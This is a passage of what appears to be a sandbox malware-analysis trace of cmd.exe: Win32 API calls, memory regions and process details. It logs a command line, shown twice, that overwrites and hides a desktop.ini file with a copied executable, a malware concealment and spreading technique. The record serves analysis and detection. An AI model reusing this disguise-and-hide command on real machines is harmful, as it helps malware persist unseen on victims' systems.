_get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.414] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.414] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.415] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.416] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.417] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.417] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.417] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.417] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.417] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x32, lpOverlapped=0x0) returned 1 [0227.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.417] GetFileType (hFile=0x4c) returned 0x1 [0227.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.417] GetFileType (hFile=0x4c) returned 0x1 [0227.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.417] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x32, lpOverlapped=0x0) returned 1 [0227.417] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.417] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.417] _close (_FileHandle=4) returned 0 [0227.417] FindNextFileW (in: hFindFile=0x320e88, lpFindFileData=0x26f074 | out: lpFindFileData=0x26f074) returned 0 [0227.418] GetLastError () returned 0x12 [0227.418] FindClose (in: hFindFile=0x320e88 | out: hFindFile=0x320e88) returned 1 [0227.418] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0227.419] _close (_FileHandle=3) returned 0 [0227.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.419] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0227.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.419] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0227.419] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.419] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0227.419] SetConsoleInputExeNameW () returned 0x1 [0227.419] GetConsoleOutputCP () returned 0x1b5 [0227.420] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.420] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.420] exit (_Code=0) Process: id = "603" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xea8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34136 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34137 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34138 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34139 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 34140 start_va = 0x4a4d0000 end_va = 0x4a51bfff entry_point = 0x4a4d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34141 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34142 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34143 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34144 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 34145 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34190 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34191 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34192 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34193 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 34194 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 34195 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34196 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34197 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34198 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34199 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34200 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34201 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34202 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34203 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34204 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 34205 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34206 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34207 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34208 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 34209 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34210 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 34211 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 34212 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 34213 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 34214 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 835 os_tid = 0xf3c [0227.118] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f9b4 | out: lpSystemTimeAsFileTime=0x26f9b4*(dwLowDateTime=0xbaf07b00, dwHighDateTime=0x1d440a9)) [0227.118] GetCurrentProcessId () returned 0xea8 [0227.118] GetCurrentThreadId () returned 0xf3c [0227.119] GetTickCount () returned 0x3ea5e [0227.119] QueryPerformanceCounter (in: lpPerformanceCount=0x26f9ac | out: lpPerformanceCount=0x26f9ac*=28390777526) returned 1 [0227.119] GetModuleHandleA (lpModuleName=0x0) returned 0x4a4d0000 [0227.119] __set_app_type (_Type=0x1) [0227.119] __p__fmode () returned 0x76b331f4 [0227.119] __p__commode () returned 0x76b331fc [0227.119] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4f21a6) returned 0x0 [0227.119] __getmainargs (in: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c, _DoWildCard=0, _StartInfo=0x4a4f4140 | out: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c) returned 0 [0227.120] GetCurrentThreadId () returned 0xf3c [0227.120] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf3c) returned 0x38 [0227.120] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.120] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0227.120] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.120] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0227.120] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f944 | out: phkResult=0x26f944*=0x0) returned 0x2 [0227.120] VirtualQuery (in: lpAddress=0x26f97b, lpBuffer=0x26f914, dwLength=0x1c | out: lpBuffer=0x26f914*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.120] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f914, dwLength=0x1c | out: lpBuffer=0x26f914*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0227.120] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f914, dwLength=0x1c | out: lpBuffer=0x26f914*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0227.120] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f914, dwLength=0x1c | out: lpBuffer=0x26f914*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.120] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f914, dwLength=0x1c | out: lpBuffer=0x26f914*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0227.120] GetConsoleOutputCP () returned 0x1b5 [0227.120] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.120] SetConsoleCtrlHandler (HandlerRoutine=0x4a4ee72a, Add=1) returned 1 [0227.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.121] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0227.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.121] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0227.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.121] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0227.121] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.121] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0227.121] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.121] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0227.121] GetEnvironmentStringsW () returned 0x2e04d8* [0227.122] FreeEnvironmentStringsW (penv=0x2e04d8) returned 1 [0227.122] GetEnvironmentStringsW () returned 0x2e04d8* [0227.122] FreeEnvironmentStringsW (penv=0x2e04d8) returned 1 [0227.122] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e8b4 | out: phkResult=0x26e8b4*=0x40) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x88, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x1, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x1, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x0, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x40, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x40, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x40, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.122] RegCloseKey (hKey=0x40) returned 0x0 [0227.122] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e8b4 | out: phkResult=0x26e8b4*=0x40) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x40, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x1, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x1, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x0, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x9, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x4, lpData=0x26e8c0*=0x9, lpcbData=0x26e8b8*=0x4) returned 0x0 [0227.122] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e8bc, lpData=0x26e8c0, lpcbData=0x26e8b8*=0x1000 | out: lpType=0x26e8bc*=0x0, lpData=0x26e8c0*=0x9, lpcbData=0x26e8b8*=0x1000) returned 0x2 [0227.123] RegCloseKey (hKey=0x40) returned 0x0 [0227.123] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bb [0227.123] srand (_Seed=0x5b8863bb) [0227.123] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"" [0227.123] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type 